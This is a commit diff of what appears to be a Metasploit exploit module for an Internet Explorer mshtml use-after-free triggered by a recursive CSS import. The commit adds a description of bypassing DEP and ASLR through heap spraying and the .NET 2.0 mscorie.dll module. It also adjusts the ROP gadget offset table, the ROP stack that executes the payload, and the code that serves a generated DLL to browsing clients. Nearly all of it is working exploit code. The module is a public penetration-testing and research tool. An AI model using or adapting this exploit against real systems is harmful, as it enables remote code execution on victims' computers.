minor clean ups

git-svn-id: file:///home/svn/framework3/trunk@11397 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-12-22 18:23:16 +00:00
parent 1407d7f1d5
commit 44c8a71dcf
1 changed files with 7 additions and 6 deletions

View File

@ -33,6 +33,11 @@ class Metasploit3 < Msf::Exploit::Remote
HTML engine (mshtml). When parsing an HTML page containing a recursive CSS
import, a C++ object is deleted and later reused. This leads to arbitrary
code execution.
This exploit utilizes a combination of heap spraying and the
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
opt-in to ASLR. As such, this module should be reliable on all Windows
versions.
},
'License' => MSF_LICENSE,
'Author' =>
@ -288,6 +293,7 @@ EOS
elsif request.uri =~ /\.dll$/
print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
# use it's contents ...
ibase = (0x2000 | rand(0x8000)) << 16
@ -330,11 +336,7 @@ EOS
'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b,
'leave / ret' => 0x25e5,
'ret' => 0x25e5+1,
'mov eax, [eax] / ret' => 0x22a2,
'mov [ecx], eax / xor eax, eax / pop esi / ret' => 0x360b9,
'call [ecx] / pop ebp / ret 0xc' => 0x1ec4,
'push eax / ret' => 0x1d1e4,
'pop eax / ret' => 0x5ba1,
'pop ebx / ret' => 0x54c0,
'pop ecx / ret' => 0x1e13,
@ -342,7 +344,6 @@ EOS
'pop edi / ret' => 0x2212,
'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6,
'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154,
'call [ecx]' => 0x1ec4
}
end
@ -389,7 +390,7 @@ EOS
rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret'
}
# Execute the payload ;)
rop_stack << 'call [ecx]'
rop_stack << 'call [ecx] / pop ebp / ret 0xc'
rop_stack.map! { |e|
if e.kind_of? String